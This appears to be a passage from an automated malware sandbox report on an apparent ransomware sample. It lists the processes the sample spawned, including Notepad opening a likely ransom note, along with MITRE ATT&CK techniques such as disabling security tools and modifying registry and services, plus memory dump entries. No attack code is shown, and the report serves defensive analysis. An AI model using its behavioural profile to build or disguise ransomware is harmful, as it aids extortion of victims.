\??\C:\Windows\system32\conhost.exe "1768954169-1449859727624017167174797351618822897071237408352005695654541155512"
1⤵
PID:3184

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10840895651552369150-631434736-623570896786017394-479893788-14324735031534458207"
1⤵
PID:624

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "856233642-24323958-1874026434737196097-1057118477-10846075891259557681827273030"
1⤵
PID:2280

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\RESTORE_FILES_INFO.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:3860

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/436-144-0x0000000004A50000-0x0000000004A51000-memory.dmp

Filesize
4KB

Download
memory/436-142-0x0000000073870000-0x0000000073F5E000-memory.dmp

Filesize
6.9MB

Download
memory/436-143-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

Filesize
4KB

Download
memory/436-148-0x0000000004990000-0x0000000004991000-memory.dmp

Filesize
4KB

Download
memory/436-147-0x0000000004A12000-0x0000000004A13000-memory.dmp

Filesize
4KB

Download
memory/436-146-0x0000000004A10000-0x0000000004A11000-memory.dmp

Filesize
4KB

Download
memory/436-145-0x00000000012D0000-0x00000000012D1000-memory.dmp

Filesize
4KB

Download
memory/528-51-0x00000000062E0000-0x00000000062E1000-memory.dmp

Filesize
4KB

Download
memory/528-18-0x0000000004982000-0x0000000004983000-memory.dmp

Filesize
4KB

Download
memory/528-36-0x0000000005630000-0x0000000005631000-memory.dmp

Filesize
4KB

Download
memory/528-13-0x0000000073870000-0x0000000073F5E000-memory.dmp

Filesize
6.9MB

Download
memory/528-40-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/528-35-0x0000000006260000-0x0000000006261000-memory.dmp

Filesize
4KB

Download
memory/528-28-0x0000000005730000-0x0000000005731000-memory.dmp

Filesize
4KB

Download
memory/528-14-0x0000000000A50000-0x0000000000A51000-memory.dmp

Filesize
4KB

Download
memory/528-27-0x00000000056D0000-0x00000000056D1000-memory.dmp

Filesize
4KB

Download
memory/528-52-0x00000000062F0000-0x00000000062F1000-memory.dmp

Filesize
4KB

Download
memory/528-22-0x0000000005670000-0x0000000005671000-memory.dmp

Filesize
4KB

Download
memory/528-17-0x0000000004980000-0x0000000004981000-memory.dmp

Filesize
4KB

Download
memory/528-19-0x0000000005270000-0x0000000005271000-memory.dmp

Filesize
4KB

Download
memory/528-15-0x00000000049C0000-0x00000000049C1000-memory.dmp

Filesize
4KB

Download
memory/528-16-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/1488-10-0x00000000004C0000-0x00000000004C1000-memory.dmp

Filesize
4KB

Download
memory/1488-8-0x0000000000150000-0x0000000000151000-memory.dmp

Filesize
4KB

Download
memory/1488-7-0x0000000073870000-0x0000000073F5E000-memory.dmp

Filesize
6.9MB

Download
memory/1932-2-0x00000000750C1000-0x00000000750C3000-memory.dmp

Filesize
8KB

Download
memory/2212-123-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

Filesize
4KB

Download
memory/2212-125-0x0000000005420000-0x0000000005421000-memory.dmp

Filesize
4KB

Download
memory/2212-117-0x0000000001180000-0x0000000001181000-memory.dmp

Filesize
4KB

Download
memory/2212-118-0x0000000004A10000-0x0000000004A11000-memory.dmp

Filesize
4KB

Download
memory/2212-122-0x0000000002910000-0x0000000002911000-memory.dmp

Filesize
4KB

Download
memory/2212-124-0x0000000000FF2000-0x0000000000FF3000-memory.dmp

Filesize
4KB

Download
memory/2212-112-0x0000000073870000-0x0000000073F5E000-memory.dmp

Filesize
6.9MB

Download
memory/3860-149-0x000007FEFB541000-0x000007FEFB543000-memory.dmp

Filesize
8KB

Download